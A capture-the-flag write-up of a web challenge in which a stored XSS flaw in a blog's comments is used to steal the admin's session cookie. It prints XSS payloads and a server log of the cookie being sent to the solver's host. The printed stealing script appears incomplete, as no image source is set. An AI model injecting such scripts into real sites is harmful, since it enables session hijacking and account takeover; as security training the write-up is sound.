Rating:

# PhotoBlog

A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea?

## Solution

By posting comments such as <script>alert(123)</script> we notice that there is an XSS vulnerability.

The admin panel is located at the address admin.php. Although, when we we try to access it we are redirected to login.php.
The XSS vulnerability can be used to get the admin's cookie in order to connect to admin.php.

After we posted the following comment

javascript
<script>
im=document.createElement('img');
document.body.appendChild(im);
</script>


we got the following request in our logs.


213.233.185.27 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"


The admin's PHPSESSID is 515386866780b5f132fc96c02b3ddb82.

Once we changed our cookie, we can access admin.php and get the flag.

Original writeup (https://github.com/QuokkaLight/write-ups/blob/master/sharif-university-ctf-2016/web/PhotoBlog.md).